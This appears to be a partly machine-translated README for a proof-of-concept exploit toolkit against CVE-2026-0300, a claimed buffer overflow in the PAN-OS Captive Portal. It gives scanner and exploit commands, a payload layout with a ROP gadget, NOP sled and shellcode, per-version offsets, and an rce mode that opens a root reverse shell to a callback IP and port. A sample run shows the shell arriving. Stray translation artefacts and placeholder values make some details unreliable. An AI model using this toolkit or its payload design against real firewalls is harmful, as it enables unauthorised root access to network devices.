
Palo Alto - CVE-2026-0300 漏洞利用
严重(CVSS 9.3) — 在 Palo Alto Networks PAN-OS Captive Portal 中未认证即可远程执行代码
CVE-2026-0300 是 Palo Alto Networks PAN-OS 软件中 User-ID 认证门户(也称为 Captive Portal)服务的一个严重缓冲区溢出漏洞。未认证攻击者可通过发送特制数据包利用此漏洞,在 PA 系列和 VM 系列防火墙上以 root 权限执行任意代码。
本仓库包含一个概念验证漏洞利用工具包,包括:
| 字段 | 值 |
|---|
| CVE ID | CVE-2026-0300 |
| 严重性 | 严重 |
| CVSS 4.0 | 9.3 (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H) |
| CWE | CWE-787: 越界写入 |
| CAPEC | CAPEC-100: 缓冲区溢出 |
| 影响 | 未认证远程代码执行(root) |
| 利用状态 | 已观察到有限的野外利用 |
于 PAN-OS 软件的 User-ID 认证门户服务中存在一个缓冲区溢出漏洞,攻击者无需认证,通过发送特制数据包即可在防火墙上以 root 权限执行任意代码。Captive Portal HTTP 服务使用固定大小的栈缓冲区解析 HTTP 头,可通过超大头值(Cookie、User-Agent、URI 或 POST 正文)导致溢出。
目标易受攻击必须同时满足以下两个条件:
| PAN-OS 分支 | 易受攻击版本 | 已修复版本 |
|---|---|---|
| 10.2 | 10.2.7, 10.2.10, 10.2.13, 10.2.16, 10.2.18 | 10.2.7-h34+ |
| 11.1 | 11.1.0–11.1.14 | 11.1.15+ |
| 11.2 | 11.2.0–11.2.11 | 11.2.12+ |
| 12.1 | 12.1.0–12.1.6 | 12.1.7+ |
不受影响:Prisma Access、Cloud NGFW、Panorama 设备。
┌─────────────────────────────────────────────────────────────────────┐ │ CVE-2026-0300 Exploit Toolkit │ ├─────────────────────────────────────────────────────────────────────┤ │ │ │ ┌────────────┐ ┌─────────────────┐ ┌────────────────────┐ │ │ │ scan.py │────▶│ HTTP Fingerprint│ │ payload_gen.py │ │ │ │ Scanner │ │ + Version Check │ │ │ │ │ └────────────┘ └─────────────────┘ │ ┌──────────────┐ │ │ │ │ │ │ Version │ │ │ │ │ Reports: │ │ Offsets │ │ │ │ │ • Portal detected? │ │ (10.2/11.1/ │ │ │ │ │ • PAN-OS version │ │ 11.2/12.1) │ │ │ │ │ • Vulnerable? │ └──────────────┘ │ │ │ ▼ │ ┌──────────────┐ │ │ │ ┌────────────┐ ┌─────────────────┐ │ │ Shellcode │ │ │ │ │ exploit.py │────▶│ Raw Socket │ │ │ Generator │ │ │ │ │ Exploit │ │ HTTP Delivery │ │ │ (x86_64 rev │ │ │ │ └────────────┘ └─────────────────┘ │ │ shell) │ │ │ │ │ │ └──────────────┘ │ │ │ │ ┌──────────────────────┐ │ ┌──────────────┐ │ │ │ ├─▶│ MODE: detect │ │ │ ROP Chain │ │ │ │ │ │ Safe, non-intrusive │ │ │ (jmp rsp) │ │ │ │ │ └──────────────────────┘ │ └──────────────┘ │ │ │ │ ┌──────────────────────┐ │ ┌──────────────┐ │ │ │ ├─▶│ MODE: crash │ │ │ HTTP Request │ │ │ │ │ │ DoS validation │ │ │ Builder │ │ │ │ │ └──────────────────────┘ │ └──────────────┘ │ │ │ │ ┌──────────────────────┐ └────────────────────┘ │ │ └─▶│ MODE: rce │ │ │ │ Reverse shell │ ┌──────────────────────┐ │ │ └──────────────────────┘ │ ReverseShellListener │ │ │ │ │ (callback receiver) │ │ │ ▼ └──────────────────────┘ │ │ ┌──────────────────┐ │ │ │ Target Firewall │ │ │ │ PAN-OS Captive │ │ │ │ Portal Service │ │ │ └──────────────────┘ │ └─────────────────────────────────────────────────────────────────────┘
### 扫描器流程```
┌─────────────┐
│ Start Scan │
└──────┬──────┘
│
▼
┌──────────────────┐ No ┌─────────────┐
│ Target reachable?│──────────▶│ Skip port │
└──────┬───────────┘ └─────────────┘
│ Yes
▼
┌──────────────────┐
│ Send HTTP GET │
│ to common ports │
│ (443,80,8080, │
│ 8443,8843) │
└──────┬───────────┘
│
▼
┌──────────────────┐ No ┌─────────────┐
│ Captive Portal │──────────▶│ Not exposed │
│ fingerprint? │ └─────────────┘
│ (login.esp, │
│ User-ID, PA-, │
│ PAN-OS, etc.) │
└──────┬───────────┘
│ Yes
▼
┌──────────────────┐
│ Extract PAN-OS │
│ version from │
│ Server header / │
│ response body │
└──────┬───────────┘
│
▼
┌──────────────────┐ No ┌─────────────┐
│ Version in │──────────▶│ Not │
│ vulnerable │ │ vulnerable │
│ range? │ └─────────────┘
└──────┬───────────┘
│ Yes
▼
┌──────────────────┐
│ Report: │
│ • VULNERABLE │
│ • Version │
│ • Matched ranges │
│ • SSL cert info │
└──────────────────┘
┌──────────────────────────────────────────────────────────────────┐ │ EXPLOIT EXECUTION FLOW │ │ │ │ 1. Generate Payload │ │ ┌──────────────────────────────────────────────────────────┐ │ │ │ [Padding to offset] [Saved FP] [ROP: jmp rsp] │ │ │ │ [NOP sled (128B)] [Shellcode (184B rev shell)] │ │ │ └──────────────────────────────────────────────────────────┘ │ │ │ │ │ 2. Embed in HTTP Header ▼ │ │ ┌──────────────────────────────────────────────────────────┐ │ │ │ GET / HTTP/1.1 │ │ │ │ Host: target:443 │ │ │ │ Cookie: │ │ │ │ Connection: close │ │ │ └──────────────────────────────────────────────────────────┘ │ │ │ │ │ 3. Start Listener ▼ │ │ ┌──────────────────┐ │ │ │ Listener binds │ ← Must start BEFORE sending payload │ │ │ on callback │ │ │ │ IP:port │ │ │ └──────────────────┘ │ │ │ │ │ 4. Send via SSL/TLS ▼ │ │ ┌──────────────────┐ │ │ │ Raw socket │ → Target Captive Portal service │ │ │ sends request │ │ │ └──────────────────┘ │ │ │ │ │ 5. Buffer Overflow ▼ │ │ ┌──────────────────────────────────────────────────────────┐ │ │ │ Portal parses Cookie header into fixed-size stack buffer│ │ │ │ Buffer overflows → overwrites saved FP + return address │ │ │ │ Return address → ROP gadget (jmp rsp) │ │ │ └──────────────────────────────────────────────────────────┘ │ │ │ │ │ 6. Code Execution ▼ │ │ ┌──────────────────────────────────────────────────────────┐ │ │ │ jmp rsp → NOP sled → shellcode executes │ │ │ │ socket() → connect(attacker_ip, port) → dup2() → │ │ │ │ execve("/bin/sh") │ │ │ └──────────────────────────────────────────────────────────┘ │ │ │ │ │ 7. Reverse Shell ▼ │ │ ┌──────────────────┐ │ │ │ Listener accepts│ → Attacker has root shell on firewall │ │ │ callback │ │ │ └──────────────────┘ │ └──────────────────────────────────────────────────────────────────┘
---
## 项目结构```
POC-CVE-2026-0300-exploit/
├── payload_gen.py # Payload generation (shellcode, ROP, HTTP request builder)
├── scan.py # Vulnerability scanner (detect Captive Portal + version)
├── exploit.py # Exploit orchestrator (detect/crash/rce modes)
├── requirements.txt # Python dependencies
└── README.md # This file
git clone [email protected]:sam00/POC-CVE-2026-0300-exploit.git cd POC-CVE-2026-0300-exploit
pip3 install -r requirements.txt
**环境要求**:Python 3.8+,核心功能仅需标准库。`requests` 为可选。
---
## 扫描器用法 — 分步说明
该扫描器执行安全、非侵入性的检查,以识别存在漏洞的 PAN-OS Captive Portal 目标。
### 第 1 步:扫描单个目标```bash
python3 scan.py --target 192.168.1.1
The scanner will:
python3 scan.py --target 192.168.1.1 --port 443
### 第 3 步:从文件扫描多个目标
创建一个文件 `targets.txt`,每行一个目标:```
192.168.1.1
10.0.0.5
firewall.example.com
# Comments are ignored
No input content was provided to translate.```bash python3 scan.py --targets targets.txt
### 步骤 4:将结果保存为 JSON```bash
python3 scan.py --target 192.168.1.1 --json scan_results.json
Target: 192.168.1.1 Ports: 443, 80, 8080, 8443, 8843 Time: 2026-08-06T12:00:00+00:00 Portal: DETECTED Status: VULNERABLE
### 扫描器检测内容
| 指标 | 方法 |
|-----------|--------|
| 暴露的强制门户 | HTTP 指纹匹配(login.esp、User-ID、PA-、PAN-OS 模式) |
| PAN-OS 版本 | 服务器标头解析、响应体正则表达式提取 |
| 易受攻击的版本 | 与 CVE-2026-0300 受影响版本范围进行比较 |
| SSL 证书 | 证书主体/颁发者用于目标识别 |
---
## 漏洞利用用法 — 分步操作
该漏洞利用支持三种强度递增的模式。
### 模式 1:检测(安全、非侵入式)
发送一个适度超大的标头,并将响应与正常请求进行比较。不会使服务崩溃。```bash
python3 exploit.py --target 192.168.1.1 --mode detect
它的作用:
发送一个带有无效返回地址(0x41414141)的缓冲区溢出负载,以使 Captive Portal 服务崩溃。```bash python3 exploit.py --target 192.168.1.1 --mode crash --version 11.2.7
**What it does**:
- 生成特定版本的溢出载荷
- 用 0x4141414141414141 覆盖返回地址
- 通过选定的溢出向量发送(默认:Cookie 头)
- 使用后续请求验证服务是否崩溃
- 报告载荷发送后服务是否宕机
**Options**:
- `--vector cookie|ua|uri|post` — 选择溢出向量(默认:cookie)
- `--http` — 使用 HTTP 代替 HTTPS
### 模式 3:完整 RCE(反弹 Shell)
发送带有反弹 Shell 载荷的缓冲区溢出。启动监听器以接收回调。```bash
python3 exploit.py --target 192.168.1.1 --mode rce \
--version 11.2.7 \
--callback-ip 10.0.0.1 \
--callback-port 4444
功能:
必需参数:
--version — 目标 PAN-OS 版本(决定缓冲区偏移和 ROP gadget)--callback-ip — 您的 IP 地址(必须可从目标访问)--callback-port — 反向 shell 回调端口(默认: 4444)可选参数:
--vector cookie|ua|uri|post — 溢出向量(默认: cookie)--nop-sled 128 — NOP sled 大小(字节)(默认: 128)--timeout 30 — 连接和监听器超时时间(秒)--http — 使用 HTTP 而非 HTTPS--json report.json — 将漏洞利用报告保存为 JSON[] RCE mode — targeting 192.168.1.1:443 (PAN-OS 11.2.7, vector: cookie) [] Callback: 10.0.0.1:4444 [] Payload generated: Vector: cookie Offset: 3072 bytes to RIP Padding: 3072 bytes ROP chain: 8 bytes NOP sled: 128 bytes Shellcode: 184 bytes Total: 3392 bytes SHA256: a1b2c3d4... [] HTTP request built: 3475 bytes [] Starting listener on 10.0.0.1:4444... [] Sending exploit payload... [*] Payload sent. Waiting for callback (timeout: 30s)... [+] REVERSE SHELL RECEIVED from 192.168.1.1!
### 支持的版本与攻击向量
**版本**(含各版本特定的缓冲区偏移):
| 版本 | 缓冲区偏移 | ROP Gadget | 默认向量 |
|---------|--------------|------------|----------------|
| 10.2.7 | 2048 | jmp rsp | cookie |
| 10.2.10 | 2048 | jmp rsp | cookie |
| 10.2.13 | 2048 | jmp rsp | cookie |
| 10.2.16 | 2048 | jmp rsp | cookie |
| 10.2.18 | 2048 | jmp rsp | cookie |
| 11.1.0 | 1024 | jmp rsp | cookie |
| 11.1.4 | 1024 | jmp rsp | ua |
| 11.1.6 | 1280 | jmp rsp | ua |
| 11.1.7 | 1280 | jmp rsp | ua |
| 11.1.10 | 1280 | jmp rsp | ua |
| 11.1.13 | 1280 | jmp rsp | ua |
| 11.2.0 | 3072 | jmp rsp | cookie |
| 11.2.4 | 3072 | jmp rsp | cookie |
| 11.2.7 | 3072 | jmp rsp | cookie |
| 11.2.10 | 3072 | jmp rsp | cookie |
| 12.1.0 | 4096 | jmp rsp | post |
| 12.1.4 | 4096 | jmp rsp | post |
**攻击向量**:
| 向量 | 头/位置 | 描述 |
|--------|----------------|-------------|
| `cookie` | Cookie 头 | Cookie 值过大导致溢出 |
| `ua` | User-Agent 头 | User-Agent 值过大导致溢出 |
| `uri` | 请求 URI 路径 | URI 路径过长导致溢出 |
| `post` | POST 请求体 | POST 表单数据过大导致溢出 |
---
## Payload 设计
### 缓冲区溢出布局```
┌─────────────────────────────────────────────────────────────────┐
│ HTTP Header Value (Cookie / User-Agent / URI / POST body) │
├──────────┬──────────┬──────────┬──────────┬────────────────────┤
│ Padding │ Saved │ ROP │ NOP │ Shellcode │
│ (to │ Frame │ Gadget │ Sled │ (reverse shell) │
│ offset) │ Pointer │ (jmp │ (\x90 │ │
│ │ (8 B) │ rsp) │ * N) │ │
└──────────┴──────────┴──────────┴──────────┴────────────────────┘
↑ ↑
Buffer overflow Return address overwritten
overwrites here with jmp rsp gadget
该漏洞利用程序使用位置无关的 x86_64 Linux shellcode,其功能如下:
socket(AF_INET, SOCK_STREAM, 0))connect())dup2())execve("/bin/sh", NULL, NULL))shellcode 总大小:约 184 字节,包含 syscall 指令(\x0f\x05)。
本工具仅供授权的安全测试和教育目的使用。仅可对您拥有或已获得明确书面许可的系统进行测试。未经授权对生产系统使用本工具属于违法行为,并可能违反计算机欺诈和滥用法律。
作者不对该工具的滥用承担任何责任。请始终遵循负责任披露实践,并遵守适用的法律法规。